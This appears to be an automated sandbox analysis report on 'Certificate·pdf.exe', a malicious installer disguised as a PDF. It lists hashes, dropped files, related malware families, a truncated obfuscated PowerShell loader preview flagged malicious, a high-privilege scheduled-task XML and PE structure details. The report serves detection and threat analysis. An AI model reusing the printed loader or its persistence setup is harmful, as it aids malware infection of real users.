        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        37f463bf4616ecd445d4a1937da06e19poMkNYHDU3.exeGet hashmaliciousRemcosBrowse
        • 142.250.191.129
        • 142.250.191.110
        SecuriteInfo.com.FileRepMalware.1111.23697.exeGet hashmaliciousUnknownBrowse
        • 142.250.191.129
        • 142.250.191.110
        lem.exeGet hashmaliciousVidarBrowse
        • 142.250.191.129
        • 142.250.191.110
        file.exeGet hashmaliciousVidarBrowse
        • 142.250.191.129
        • 142.250.191.110
        file.exeGet hashmaliciousBabuk, DjvuBrowse
        • 142.250.191.129
        • 142.250.191.110
        5gO02Ijl9V.exeGet hashmaliciousGuLoaderBrowse
        • 142.250.191.129
        • 142.250.191.110
        ooXgr5BYnA.exeGet hashmaliciousGuLoader, LokibotBrowse
        • 142.250.191.129
        • 142.250.191.110
        7Bkd5ILk1o.exeGet hashmaliciousGuLoader, LokibotBrowse
        • 142.250.191.129
        • 142.250.191.110
        oFNtjcXGVB.exeGet hashmaliciousFormBook, GuLoaderBrowse
        • 142.250.191.129
        • 142.250.191.110
        Co0Wd0QVRU.exeGet hashmaliciousRemcos, GuLoaderBrowse
        • 142.250.191.129
        • 142.250.191.110
        No context
        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
        File Type:ASCII text, with CRLF line terminators
        Category:modified
        Size (bytes):20
        Entropy (8bit):3.6841837197791887
        Encrypted:false
        SSDEEP:3:QHXMKas:Q3Las
        MD5:B3AC9D09E3A47D5FD00C37E075A70ECB
        SHA1:AD14E6D0E07B00BD10D77A06D68841B20675680B
        SHA-256:7A23C6E7CCD8811ECDF038D3A89D5C7D68ED37324BAE2D4954125D9128FA9432
        SHA-512:09B609EE1061205AA45B3C954EFC6C1A03C8FD6B3011FF88CF2C060E19B1D7FD51EE0CB9D02A39310125F3A66AA0146261BDEE3D804F472034DF711BC942E316
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview:1,"fusion","GAC",0..
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:modified
        Size (bytes):8003
        Entropy (8bit):4.840877972214509
        Encrypted:false
        SSDEEP:192:Dxoe5HVsm5emda2Ca6pZlbjvwRjdHPRhHgkjDt4iWN3yBGHVQ9smzdcU6CDQpOFP:J5opbjvwRjdvRCkjh4iUx5Uib4J
        MD5:C7C7584B53C7E1685BD19C0CAEBB4C44
        SHA1:4F9D95010E36559C4F2D15E0E9C20349A65783A6
        SHA-256:F5DBB7A566A3BD3A84DB8FC60784E768CC6753BACD192C6CD71098F1C0B4B01E
        SHA-512:281C50EBE3BAB2836D1C06B7DE27E320F8D43A11956165D40007BBFF3B6D78A3AC6094E6A7AB762F627E308C9A4E40139B8D0A347669C5D32B5AB3AA4EDEA9D7
        Malicious:false
        Reputation:low
        Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):64
        Entropy (8bit):0.34726597513537405
        Encrypted:false
        SSDEEP:3:Nlll:Nll
        MD5:446DD1CF97EABA21CF14D03AEBC79F27
        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
        Malicious:false
        Preview:@...e...........................................................
        Process:C:\Users\user\Desktop\Certificate#U00b7pdf.exe
        File Type:ASCII text, with very long lines (19791), with no line terminators
        Category:dropped
        Size (bytes):19791
        Entropy (8bit):5.406271986309318
        Encrypted:false
        SSDEEP:384:d1UVuZ5m6xESOxlNqZRBpMMXc3DCUay5NJGUNZv39GifHHoBTCdS+WTe11Z7:QVurNFOTNq7BCWUakNJLR39GifHHc86O
        MD5:96E01A7F78D8E8CCCDC83224CEAEB4B9
        SHA1:0DDC2F6A375C495797450BD9335598A9B5EE0C5E
        SHA-256:BF8DCC7B82D62ADD6B0D32997E6134C1BB1709F7888746E996E3704573AD8791
        SHA-512:559975800C90E8A2A709DD48F83FB9761009492571DCF98D2A4F300F75CA9304B359AD39B4356F6594ED62DD862413701AD9FD43970338CB37DDCD1F48AB9EE4
        Malicious:true
        Preview:<#Fordaervet Kauch Ticklenburg Synonymized Nippers Hysse #>$Boarspear = """Pe;ReF SuSunSkc OtPri Po Cn D AeBCarTju Cd Kg coAsmSemDee M0Wa4 K B{St Do Tr U KopTeaFor oaatmNo(Ov[HaSPot Fr UiSlnSpgVo] H`$PiS Ca UlSteAns FwDio Om Fe Un p)Re; D De d A D`$ RT Fh viChoOpt Ch Wr Ti Ex T No= R SNNoeInwUd-OcOReb UjFoe ScGotOc MebMiyLdtPreIn[Fo] P Sc(Ib`$ CSSpa ll UeEns MwSeoGdm BeDynAn.InL De An BgJot Ch P Fo/Co A2Su) I; D Ma Sc F FlFFyoSlrMe(Sc`$ PA DnPitPai FlMuaTrbAso PrSks K=Pa0Ra;Bi B`$BaA Nn GtPoi LlspaRabHvo SrBls V Pr- Ml AtBo Fa`$PaSDia SlOpeBaslew So Sm Ze MnSl.LyLVaeDrn Yg Ft Dh T;Il Lf`$ PA pnHyt Ci NlEkaTabFioStrSks C+ I=Li2An)Af{Ku D Sk E St Ku Pe Fo Fa`$ekT BhSei SogutBehinr uiVaxUn[Ta`$BiAYondat SiRelIma AbGuo Nr Ws t/ T2 P] F No= O Pa[uncGloInn BvPye SrUntSe]Im: U:CaTTho PBSyyantAueUn(Fj`$ SS Ia Tl SeMes Fw Bo bmfoeBonSu.KlS au Kb Ss MtLor TiSpnAng Z(St`$PhAUnnsatBui HlFoaMybMioSorTus D, I Er2un) G,In au1Mu6Ca)Mi;En.Re.Ti`$ReT Fh SiRooFit Sh PrSoi DxSv[ar`$GaACinTrtEdi
        Process:C:\Users\user\Desktop\Certificate#U00b7pdf.exe
        File Type:Unicode text, UTF-8 text
        Category:dropped
        Size (bytes):26423
        Entropy (8bit):3.554983747162495
        Encrypted:false
        SSDEEP:768:OwUkxkf27FkrH9tW/JgODfFFuHgFFqfw8QCBdqLMCl:Ogxkf27FkrdtW/JgOD9FuHgFFqfwLidW
        MD5:C71FCA9FD3FE9F85514CB38A58859DE2
        SHA1:A4EC1DA6C11A8C251195C7AD90817DDA6FE64488
        SHA-256:2EED0AEF492291E061633D7AD8117F1A2B03EB80A29D0E4E3117AC2528D05FFD
        SHA-512:3FAF87F7E48EB6635F7D7B18A34E7DACBC2C43A1CF6AA9C96015B2A3549710B8B7A0961E5D2E32D7E369099DB89A874C4D761A8384FB558744C7F47CA8CB0772
        Malicious:false
        Preview:................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Users\user\Desktop\Certificate#U00b7pdf.exe
        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
        Category:dropped
        Size (bytes):5841
        Entropy (8bit):5.148203465705585
        Encrypted:false
        SSDEEP:96:iPHrOVp0Wqx9Zgwx+tBttSTULz9bkfHas8SwQfBMoWURypM4L4l28Wgk+drzNadK:iP6Vpu1MZtSTWbkvasTwQjZRyps+g9kK
        MD5:6E9A3E86335C08C15350BA91DF969269
        SHA1:3C5FDC93B569DB37B76009F51483E7BF55A7919B
        SHA-256:A00B21A87A58ADEFF29EA379160B6AE72DF5EC380F6E4C6A1BC352B6581FB4C4
        SHA-512:C9919CA7FF62B673A22447029D77630C44D71847E0B4D2D8C572FC6E0FA51CC03473BE46B87C0DCAFE0194CB12119E8706286060622E42892702EC3C6239AD0F
        Malicious:false
        Preview:.;!@Lang2@!UTF-8!..; 4.37 : Rizoy. Xerz...;..;..;..;..;..;..;..;..;..;..0..7-Zip..Kurdish..Kurd...401..Temam..Betal........&Er...&Na..Bi&gire..Al.kar.....Bi&dom.ne..440..&Ji Bo Hem.y. Er...Ji &Bo Hem.y. Na..Raweste..D.sa Destp.ke..L%i Pi.t..Li &P....&Rawest.ne..Rawestiya -..Ma bila betal bibe?..500..&Dosya..&Bipergal.ne..&N..an Bide..Bi&jare..&Am.r..A&l.kar...540..&Veke..&Di Panel. De Veke..Di &Pacey. De Veke..&N..an Bide..&Sererast bike..&Navek. N. Bid...&Ji Ber Bigire..B&ar Bike..J. B&ibe..Par.e Bi&ke.....Bike &Yek.....&Taybet...Da&xuyan...checksum heseb bike....Pe&ldankeke N...Do&siyeke N...De&rkeve..600..&Hem.y. hilbij.re..He&m. hilijartin. rake..Be&revaj. w. hilbij.re..&Hilbij.re.....Hilbijarti&n. Rake.....V. curey. hilbij.re..Hilbijartina cure rake..700..&Daw.r.n Mezin..D&aw.r.n Bi..k..&L.ste..&H.ragah...730..B. Dor..xuyakirina sade..&2 Panelan veke..Da&rik. am.ran..Peldanka Kok Veke..Astek. Berjor..D.roka Peldank
        Process:C:\Users\user\Desktop\Certificate#U00b7pdf.exe
        File Type:data
        Category:dropped
        Size (bytes):281497
        Entropy (8bit):7.457168665740074
        Encrypted:false
        SSDEEP:6144:jCPiAm8M/GCrDDnkwz3/5Nl2xo8z1efe79:ZAC/GCrUQLluW279
        MD5:EA9008DCEE3A6E78B4855F2AE9EC202D
        SHA1:06BBB64D3AFB291AFBCB56CF4E9D7BF41CD3ADA6
        SHA-256:8BB95F866A2D1DD926ADB4462D53841EBC3D9B400E5A84D26413BF0E424A5790
        SHA-512:E5216E669A4DF3877ACF0471EBF2EA7B8C5D4C3D45238F78A5A366293EF809D15B5D9B52483CFFC244C79E3AB4842A93F94CAE610B30E8C68B4686417C538956
        Malicious:false
        Preview:.............=............&......"..........^..............w.....q.............LL.......................................44444...............................................................0...............***............mm........GG.....rr..&...........bbb...xx......\............pp...................................................LL...s..Z..........X................A......G.f.88.l.............p.....}......F...........MMM........++............5......o..LL.111.................|.......;;........HHH................<<<<...tt....@...................o..MMMMMM..""....................QQ..................................$.....J................;........R......,..__.........44..].....d...uu...........VVVVVVVV.............KK..q..................mmm.u......e..........~~.........ii...........w.Y...tttttt..\\\\...............................................D..<......y.................................xxx.....//.................N.cc..........#.................................WW..=........).KKK........[[
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):60
        Entropy (8bit):4.038920595031593
        Encrypted:false
        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
        MD5:D17FE0A3F47BE24A6453E9EF58C94641
        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
        Malicious:false
        Preview:# PowerShell test file to determine AppLocker lockdown mode
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):60
        Entropy (8bit):4.038920595031593
        Encrypted:false
        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
        MD5:D17FE0A3F47BE24A6453E9EF58C94641
        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
        Malicious:false
        Preview:# PowerShell test file to determine AppLocker lockdown mode
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):60
        Entropy (8bit):4.038920595031593
        Encrypted:false
        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
        MD5:D17FE0A3F47BE24A6453E9EF58C94641
        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
        Malicious:false
        Preview:# PowerShell test file to determine AppLocker lockdown mode
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):60
        Entropy (8bit):4.038920595031593
        Encrypted:false
        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
        MD5:D17FE0A3F47BE24A6453E9EF58C94641
        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
        Malicious:false
        Preview:# PowerShell test file to determine AppLocker lockdown mode
        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):1319
        Entropy (8bit):5.131285242271578
        Encrypted:false
        SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0mnJxtn:cbk4oL600QydbQxIYODOLedq3ZJj
        MD5:497F298FC157762F192A7C42854C6FB6
        SHA1:04BEC630F5CC64EA17C0E3E780B3CCF15A35C6E0
        SHA-256:3462CBE62FBB64FC53A0FCF97E43BAAFE9DD9929204F586A86AFE4B89D8048A6
        SHA-512:C7C6FD3097F4D1CCD313160FEDF7CB031644E0836B8C3E25481095E5F4B003759BC84FC6EA9421E3A090E66DC2FF875FEC2F394A386691AB178CB164733411B2
        Malicious:true
        Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
        File Type:International EBCDIC text, with no line terminators
        Category:dropped
        Size (bytes):8
        Entropy (8bit):3.0
        Encrypted:false
        SSDEEP:3:ktn:ktn
        MD5:3CD911AE73862FDF8C06CA630737A36E
        SHA1:6CC16AC9160C9E5506B1E35A3C1050E29DD6D8F6
        SHA-256:9146F42E89C7A69ED49F9D7F4AE52F703FF6064AE30FFF70B338CBA530F28FD5
        SHA-512:F9BEEB8F01BC42B94CE3D4517AE511BB74FD30A544808F3DC95369F49ADB6664D179FFA6BF1909368C600F19CDE2C4B60A95FDA26D3D4BA71DFB48C5016DC290
        Malicious:true
        Preview:......H
        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):56
        Entropy (8bit):4.745141646068962
        Encrypted:false
        SSDEEP:3:oMty8WbSmm:oMLWumm
        MD5:F781103B538E4159A8F01E3BE09B1F8D
        SHA1:27992585DE22A095BABCFD75E8F96710DD921C37
        SHA-256:BEA91983791C26C19AA411B2870E89AFC250EAF9855B6E1CE7BEA02B74E7F368
        SHA-512:D50AE0A01E74FC263B704FADE17CDF4993B61E34FD498827D546F090CE2DA5E8F24D4D34FBF360AE7EE5C5E7E3F032F3DDA8AD0C2A2CF0E1DAFEED61258AB4CA
        Malicious:false
        Preview:C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):182
        Entropy (8bit):5.07060597644582
        Encrypted:false
        SSDEEP:3:RGXKRjN3Mxm8d/AjhclROXDD9jmKXVM8/FOoDamd9xraWMZ4MKLJFcLEWgJya7:zx3M7ucLOdBXVNYmd9NaWM6MKnH5JyY
        MD5:B08826036A3E81B44E7D8C1284381013
        SHA1:96CF7E6BC1B55C69CE33BEC3B78FFF4EB8839B87
        SHA-256:E7AD5092F56BB2ACA26262C361FE5F83171D21AB134D4E5D2EF47E9BF641B549
        SHA-512:EB9908F6FB6398EDCE4F3B18AA64ABEE8774D1CA3A5B533617C97AAC5E795627CCB8B1176BE64371E6BEF6352004FC2B4862A388D61A6103D05B5B2D02CD0481
        Malicious:false
        Preview:Microsoft (R) .NET Framework CasPol 2.0.50727.9149..Copyright (c) Microsoft Corporation. All rights reserved.....ERROR: Invalid option: 0....For usage information, use 'caspol -?'..
        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
        Entropy (8bit):7.294437364550473
        TrID:
        • Win32 Executable (generic) a (10002005/4) 99.96%
        • Generic Win/DOS Executable (2004/3) 0.02%
        • DOS Executable Generic (2002/1) 0.02%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name:Certificate#U00b7pdf.exe
        File size:414'504 bytes
        MD5:6db7bb3d97afa79630d4085427e93bdf
        SHA1:c3c7306af8b9b4fa9602dec9b128f895af169646
        SHA256:6f3d9c1d62a29f4a030a0d2bded9600599d301784f5f0b6edfc96fc3b2b404fb
        SHA512:8322052981a347b45b867cc78e1b2ef2fe009c424b4e3f293e36aa012efe38710c357aabe7392b2e925969e802abc610ebf9be36c0ff7c7f37f3ad7165effed3
        SSDEEP:6144:olgvTRHyKTMEftsqrTCLNOMK8YRW+gFaZ2Bx54h6MKQagKH/UdNK1jM5KlqH:42ZhjzErFaZ2Bz4QMdaDH/ULk4
        TLSH:0794CE5728DC8AC2D5AD06300CEDF72D7E26AE253C208E1B6E95F63E683125156F723D
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....oZ.................d....:....
        Icon Hash:b2eece86d2c6ceb2
        Entrypoint:0x40336c
        Entrypoint Section:.text
        Digitally signed:true
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Time Stamp:0x5A6FED1F [Tue Jan 30 03:57:19 2018 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:4
        OS Version Minor:0
        File Version Major:4
        File Version Minor:0
        Subsystem Version Major:4
        Subsystem Version Minor:0
        Import Hash:b34f154ec913d2d2c435cbd644e91687
        Signature Valid:false
        Signature Issuer:E=ulandene@Corcopali.Ku, OU="Pruinescence Maskeforbuddets ", O=Massbus, L=Les Marches, S=Auvergne-Rh\xf4ne-Alpes, C=FR
        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
        Error Number:-2146762487
        Not Before, Not After
        • 16/09/2022 12:06:26 15/09/2025 12:06:26
        Subject Chain
        • E=ulandene@Corcopali.Ku, OU="Pruinescence Maskeforbuddets ", O=Massbus, L=Les Marches, S=Auvergne-Rh\xf4ne-Alpes, C=FR
        Version:3
        Thumbprint MD5:11C802B835F07C0212A6D4026F41FE39
        Thumbprint SHA-1:013E38BE1B856F19BB639CEBFCD9369B84F289E3
        Thumbprint SHA-256:FC40A38D2552D24E873FC5A90501F5E0CF812D91ED56E86C198C2EDB0292759D
        Serial:51F15813901F70C07491F94FBC623762B9BBCB02
        Instruction
        sub esp, 000002D4h
        push ebx
        push esi
        push edi
        push 00000020h
        pop edi
        xor ebx, ebx
        push 00008001h
        mov dword ptr [esp+14h], ebx
        mov dword ptr [esp+10h], 0040A2E0h
        mov dword ptr [esp+1Ch], ebx
        call dword ptr [004080A8h]
        call dword ptr [004080A4h]
        and eax, BFFFFFFFh
        cmp ax, 00000006h
        mov dword ptr [007A8A2Ch], eax
        je 00007F1510D28FF3h
        push ebx
        call 00007F1510D2C2A5h
        cmp eax, ebx
        je 00007F1510D28FE9h
        push 00000C00h
        call eax
        mov esi, 004082B0h
        push esi
        call 00007F1510D2C21Fh
        push esi
        call dword ptr [00408150h]
        lea esi, dword ptr [esi+eax+01h]
        cmp byte ptr [esi], 00000000h
        jne 00007F1510D28FCCh
        push 0000000Ah
        call 00007F1510D2C278h
        push 00000008h
        call 00007F1510D2C271h
        push 00000006h
        mov dword ptr [007A8A24h], eax
        call 00007F1510D2C265h
        cmp eax, ebx
        je 00007F1510D28FF1h
        push 0000001Eh
        call eax
        test eax, eax
        je 00007F1510D28FE9h
        or byte ptr [007A8A2Fh], 00000040h
        push ebp
        call dword ptr [00408044h]
        push ebx
        call dword ptr [004082A0h]
        mov dword ptr [007A8AF8h], eax
        push ebx
        lea eax, dword ptr [esp+34h]
        push 000002B4h
        push eax
        push ebx
        push 0079FEE0h
        call dword ptr [00408188h]
        push 0040A2C8h
        Programming Language:
        • [EXP] VC++ 6.0 SP5 build 8804
        NameVirtual AddressVirtual Size Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
        IMAGE_DIRECTORY_ENTRY_RESOURCE0x3cb0000x1bf60.rsrc
        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
        IMAGE_DIRECTORY_ENTRY_SECURITY0x630e80x2240.data
        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
        .text0x10000x64000x6400eed0986138e3ef22dbb386f4760a55c0False0.6783203125data6.511089687733535IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        .rdata0x80000x138e0x14002914bac53cd4485c9822093463e4eea6False0.4509765625data5.146454805063938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .data0xa0000x39eb380x60009e0c528682cd2747c63b7ba39c2cc23unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .ndata0x3a90000x220000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .rsrc0x3cb0000x1bf600x1c000b77ccb4745048eb38afe9b9645a88130False0.19359479631696427data4.072795012004936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        NameRVASizeTypeLanguageCountryZLIB Complexity
        RT_ICON0x3cb2f80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/mEnglishUnited States0.06339465278599314
        RT_ICON0x3dbb200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/mEnglishUnited States0.11785545583372697
        RT_ICON0x3dfd480x2e68PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9894781144781145
        RT_ICON0x3e2bb00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/mEnglishUnited States0.1521784232365145
        RT_ICON0x3e51580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/mEnglishUnited States0.19394934333958724
        RT_ICON0x3e62000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/mEnglishUnited States0.3147163120567376
        RT_DIALOG0x3e66680x100dataEnglishUnited States0.5234375
        RT_DIALOG0x3e67680x11cdataEnglishUnited States0.6091549295774648
        RT_DIALOG0x3e68880xc4dataEnglishUnited States0.5918367346938775
        RT_DIALOG0x3e69500x60dataEnglishUnited States0.7291666666666666
        RT_GROUP_ICON0x3e69b00x5adataEnglishUnited States0.7666666666666667
        RT_VERSION0x3e6a100x210dataEnglishUnited States0.4734848484848485
        RT_MANIFEST0x3e6c200x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
        DLLImport
        KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
        USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
        SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
        ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
        COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
